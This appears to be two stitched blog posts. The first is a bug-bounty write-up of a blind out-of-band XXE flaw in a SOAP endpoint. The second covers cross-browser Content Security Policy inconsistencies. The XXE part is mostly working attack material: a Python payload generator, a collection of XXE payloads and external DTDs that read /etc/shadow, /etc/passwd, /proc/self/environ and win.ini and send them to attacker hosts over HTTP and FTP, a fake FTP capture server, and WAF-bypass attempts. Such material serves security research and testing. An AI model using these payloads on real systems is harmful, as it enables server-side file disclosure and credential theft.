As with the beginning of any hunter’s quest, thorough recon is necessary to identify as many in-scope assets as possible. Through this recon, I was able to discover a subdomain that caught my interest. I then brute forced the directories of the subdomain, and found the endpoint /notifications. Visiting this endpoint via a GET request resulted in the following page:

I noticed the XML content-type of the response, along with an XML body containing SOAP syntax. Since I had no GET parameters to test, I decided to issue a POST request to the endpoint, finding that the body of the response had disappeared, with a response code of 200. Since the web application seemed to be responding well to the POST request, instead of issuing a 405 Method Not Allowed error, I decided to issue a request containing XML syntax with the content-type application/xml. The resulting response was also different than in the previous cases. This response was also in XML, as it was when issuing the GET request to this endpoint. However, this time, within the tags is the value “OK” instead of the original value “TestRequestCalled”.

I also tried to send a JSON request to see how the application would respond. Below is the result.

Seeing as how the response was blank, as it was when issuing a POST request with no specified content type, I had a strong belief that the endpoint was processing XML data. This was enough for me to set up my VPS to host a DTD file for the XML processor to “hopefully” parse. Below is the result of the DTD being successfully processed, with the requested file contents appended.
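To see how the two halves of the out-of-band technique fit together, the XML body sent to the endpoint references a DTD hosted on the attacker's VPS, and that DTD reads a file and leaks its contents back inside a URL. The sketch below is a hypothetical Python generator for both artifacts; the hostnames, filenames (ev.xml) and target paths are placeholders, and the structure mirrors the classic parameter-entity OOB pattern:

```python
def build_oob_xxe(attacker_url, target_file):
    """Build the request body and the hosted DTD for a blind OOB XXE probe.
    attacker_url and target_file are placeholders supplied by the tester."""
    body = (
        '<?xml version="1.0" ?>\n'
        '<!DOCTYPE r [\n'
        '<!ELEMENT r ANY >\n'
        f'<!ENTITY % sp SYSTEM "{attacker_url}/ev.xml">\n'
        '%sp;\n'
        '%param1;\n'
        ']>\n'
        '<r>&exfil;</r>'
    )
    # Hosted as ev.xml on the attacker server: %data reads the target file,
    # %param1 defines an entity that leaks it back in a URL query string.
    dtd = (
        f'<!ENTITY % data SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % param1 "<!ENTITY exfil SYSTEM \'{attacker_url}/?%data;\'>">'
    )
    return body, dtd

body, dtd = build_oob_xxe("http://x.x.x.x:443", "/etc/hostname")
print(body)
print(dtd)
```

Sending the generated body to the endpoint and watching the attacker server's access log for the inbound `/?...` request is what turns a blind vulnerability into confirmed file disclosure.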
I also used this script to set up an FTP server listening, so I would also be able to extract the server’s information/file contents through the FTP protocol: https://github.com/ONsec-Lab/scripts/blob/master/xxe-ftp-server.rb

Although this submission was marked as a duplicate, I wanted to share this finding as it was a good learning experience, and I was able to examine how the application was responding to certain inputs without knowing its exact purpose/functionality. The original reporter had not been able to extract information from the server, and received $8k for this issue.

Some helpful XXE payloads:

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">
----------------------------------------------------------------
OoB variation of above (seems to work better against .NET)
----------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>

## External dtd: ##
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY % exfil SYSTEM 'http://x.x.x.x:443/?%data;'>">
---------------------------------------------------------------
OoB extraction
---------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp;
%param3;
%exfil;
]>

## External dtd: ##
<!ENTITY % param3 "<!ENTITY % exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">
-----------------------------------------------------------------------
OoB extra ERROR -- Java
-----------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>

## External dtd: ##
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'>
%param1;
%external;
-----------------------------------------------------------------------
OoB extra nice
-----------------------------------------------------------------------
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>

## External dtd: ##
<!ENTITY all "%start;%stuff;%end;">
------------------------------------------------------------------
File-not-found exception based extraction
------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>

## External dtd: ##
<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">
-------------------------^ you might need to encode this % (depends on your target) as: &#x25;
--------------
FTP
--------------
<?xml version="1.0" ?>
<!DOCTYPE a [
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>

## External dtd ##
<!ENTITY % d SYSTEM
"file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
---------------------------
Inside SOAP body
---------------------------
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
---------------------------
Untested - WAF Bypass
---------------------------
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"

Source: https://hawkinsecurity.com/2018/03/24/gaining-filesystem-access-via-blind-oob-xxe/
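For completeness, here is a rough Python analogue of the linked xxe-ftp-server.rb: a fake FTP service that accepts any login and records every command, since in FTP-based XXE exfiltration the stolen data arrives embedded in commands such as USER, PASS or CWD. The port handling and command responses here are simplified assumptions, not the Ruby script's actual behavior:

```python
import socket
import threading

def run_fake_ftp(server_sock, log):
    """Accept one connection and log every FTP command line the client sends."""
    conn, _ = server_sock.accept()
    conn.sendall(b"220 fake ftp ready\r\n")
    buf = b""
    while True:
        data = conn.recv(1024)
        if not data:
            break
        buf += data
        while b"\r\n" in buf:
            line, buf = buf.split(b"\r\n", 1)
            log.append(line.decode(errors="replace"))
            # Answer everything positively so the parser keeps talking.
            conn.sendall(b"230 ok\r\n")
    conn.close()

# Listen on an ephemeral localhost port for this demonstration.
srv = socket.socket()
srv.bind(("127.0.0.1", 0))
srv.listen(1)
captured = []
threading.Thread(target=run_fake_ftp, args=(srv, captured), daemon=True).start()

# Simulate the victim's XML parser connecting and leaking data over FTP.
client = socket.create_connection(srv.getsockname())
client.recv(64)                        # 220 banner
client.sendall(b"USER anonymous\r\n")
client.recv(64)                        # 230 ok
client.sendall(b"PASS fake-exfil-data\r\n")
client.recv(64)                        # 230 ok
client.close()

print(captured)  # ['USER anonymous', 'PASS fake-exfil-data']
```

In a real engagement the captured lines would contain the contents of the file referenced by the `%d;` entity, split across FTP commands.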
-
Stefan Matsson 2018-03-26 # Security

CSP IMPLEMENTATIONS ARE BROKEN

TL;DR

frame-src is inconsistent cross-browser
block-all-mixed-content is broken in Chrome and Opera
CSP reports are inconsistent
Edge has some weird edge cases (no pun intended)

INTRO

There has been a lot of talk lately about Content Security Policy (CSP) after an accessibility script called BrowseAloud got infected by a cryptominer and forced the users of a couple of thousand websites to mine cryptocurrency without their knowledge. Content Security Policy could have prevented this issue, as it contains rules for what the browser can load and what not to load. Read more at https://content-security-policy.com

I recently held a talk with the title “Content Security Policy - Or how we ruined our site, learned a lesson, broke the site again and then fixed it”. This talk was based on my work at my current client. This post is sort of a summary of that talk and will outline some of the issues we found with different combinations of devices, OSs, browsers, extensions and whatnot.

SOME INFO ON THE SYSTEM WE ARE BUILDING

My client provides payment services for e-commerce. The system will be loaded as an iframe on the e-commerce site and allows the customer to finish their purchase. We use features in CSP that require us to use CSP2 (e.g. script hashes). Our system in turn loads an iframe from a trusted service provider (let’s call it SystemX). SystemX will in some cases redirect to one of their trusted providers. SystemX has literally hundreds of trusted providers all over the world, and each of these have their own page that must be loaded in the iframe. I will not go into more detail than that, to avoid revealing too much information about my client.

FRAME-SRC IS INCONSISTENT CROSS BROWSER

If your CSP contains a frame-src that does not contain mailto: or tel:, these links will be blocked inside the iframe except in Firefox and Edge.
Firefox will open both links and Edge will open the mailto link but block the tel link. I’m not really sure if it’s broken in Firefox or in the other browsers; there are valid arguments for both cases.

Workaround: Add mailto: and tel: to your CSP: frame-src 'self' mailto: tel:

I have reported this to Microsoft but have not heard back.

Affected browsers: Firefox and Edge, or all others, depending on your point of view
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-links-frame-src/

EDGE AND CUSTOM ERROR PAGES

We load an iframe from a trusted service provider which in turn redirects to different sites depending on circumstances. As we cannot know what URLs will be redirected to, we currently use this frame-src in our CSP: frame-src 'self' data: https:

The issue with Edge is that it will load custom error pages for issues such as DNS errors, SmartScreen blocking and error responses from the server (e.g. 400, 404, 500 etc). The error page is loaded via a ms-appx-web:// URL (e.g. ms-appx-web:///assets/errorpages/http_500.htm) which is blocked by the CSP, and a blank page is displayed to the user. The result is that our service provider’s iframe is just blank if an error occurs. I have reported this issue to Microsoft in early March but have not heard anything back from them.

Workaround: Add ms-appx-web: to our frame-src: frame-src 'self' data: https: ms-appx-web:

Affected browsers: Edge
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/edge-ms-appx-web-frame-src/

EDGE AND EXTENSIONS

Extensions installed in Edge are subject to the current page’s content security policy. Basically all installed extensions that try to do anything, from loading images to JS, will fail, and a CSP violation will be logged. According to the CSP spec this is wrong. The issue has been fixed but not yet released, according to the Edge issue tracker (issue 1132012).
Affected browsers: Edge

BLOCK-ALL-MIXED-CONTENT BLOCKS TEL AND MAILTO LINKS IN IFRAMES BUT NOT IN THE PARENT PAGE

If you serve your site using HTTPS and use the block-all-mixed-content directive in your CSP, mailto and tel links will be blocked inside iframes but not on your main page. This does not happen if you serve the site using HTTP. If the user tries to click a mailto or tel link on your page (i.e. the parent page) it will work as intended. Clicking the same links in an iframe will log one of these two errors:

Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'mailto:...'. This request has been blocked; the content must be served over HTTPS.

Mixed Content: The page at 'https://...' was loaded over HTTPS, but requested an insecure resource 'tel:...'. This request has been blocked; the content must be served over HTTPS.

This issue has been reported to Google and Opera. Opera has not yet responded.

Workaround: Remove block-all-mixed-content from your CSP (possibly use upgrade-insecure-requests instead)

Affected browsers: Chrome and Opera
Proof of concept: https://jellyhive.github.io/CspImplementationsAreBroken/mailto-and-tel-link-block-all-mixed-content/

SAFARI ON OLDER IOS DEVICES DOES NOT SUPPORT CSP2

“Older” in this case meaning iOS 9 or earlier. Safari on iOS 10 and 11 does support CSP2. Since we require the use of script hashes, we also require CSP2. Desktop Safari is also affected, but that is not as big of a problem, as most desktops are kept up to date. Current usage on our site is less than 0.9% for older Safari on desktop.

Workaround: There is no way to make this work, so we have disabled CSP for older iOS devices using user agent sniffing.

Affected browsers: Safari on iOS < 10 (both iPhone and iPad) and Safari 9 or earlier on desktop

INTERNET EXPLORER 11 ONLY SUPPORTS X-CONTENT-SECURITY-POLICY AND CSP1

IE11 supports CSP1 using the X-Content-Security-Policy header.
If you wish to support IE11 you need to either do some user agent sniffing and change the header from Content-Security-Policy to X-Content-Security-Policy, or send out both headers for everyone. In our case we barely have any customers on IE11, so we just send out the regular Content-Security-Policy header, which is then ignored by IE11.

Affected browsers: Internet Explorer 11 (older versions do not support CSP)

CSP REPORTS DIFFER BETWEEN BROWSERS

The reports sent to your report-uri should follow a common standard defined in the CSP spec, but browsers differ on what data they send. Some versions of Safari include the entire CSP in the violated-directive property. This is like saying “Something went wrong. You find out what and deal with it.” Chrome on Android sometimes does not provide a blocked-uri when the violated-directive is frame-src. This means that we have no way of knowing what URL was blocked in the iframe. Most browsers do not provide a script-sample when an inline script is blocked. script-sample is very helpful in debugging what script was blocked.

CSP REPORTS CONTAIN LOTS OF FALSE POSITIVES

This is primarily due to browser extensions. Most extensions work by injecting code on the page, and code on the page is subject to the page’s CSP. A common issue we have found in our logs is violated-directive: script-src with blocked-uri: about:blank, which is caused by adblockers when they replace the loading of tracking scripts (e.g. Google Analytics) with the loading of about:blank.

SUMMARY

Content Security Policy is a great tool that should be deployed in more places. It does however take some fine tuning to make it work properly on a specific site.

Source: https://jellyhive.com/activity/posts/2018/03/26/csp-implementations-are-broken/
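The reporting quirks described in this post (whole-policy violated-directive values from some Safari versions, missing blocked-uri in Chrome on Android, about:blank noise from adblockers) lend themselves to a small server-side normalization step before reports are logged. The Python sketch below encodes those observations; the field names follow the CSP violation report format, but the filtering rules are assumptions drawn from this post, not any standard:

```python
def normalize_csp_report(report):
    """Normalize one 'csp-report' object; return None for known noise."""
    violated = report.get("violated-directive", "")
    blocked = report.get("blocked-uri", "")

    # Some Safari versions put the entire policy in violated-directive;
    # keep only the first directive name so reports group sensibly.
    directive = violated.split(";")[0].split()[0] if violated.strip() else "unknown"

    # Adblockers commonly replace tracking scripts with about:blank,
    # producing script-src violations that are not the site's bug.
    if directive == "script-src" and blocked == "about:blank":
        return None

    # Chrome on Android sometimes omits blocked-uri for frame-src;
    # mark it explicitly instead of logging an empty field.
    return {
        "directive": directive,
        "blocked_uri": blocked or "(not reported)",
        "sample": report.get("script-sample", ""),
    }

print(normalize_csp_report({"violated-directive": "script-src",
                            "blocked-uri": "about:blank"}))  # None
print(normalize_csp_report({"violated-directive": "frame-src 'self'"}))
```

Filtering like this at the report-uri endpoint keeps extension noise out of the logs while still surfacing the genuinely actionable violations.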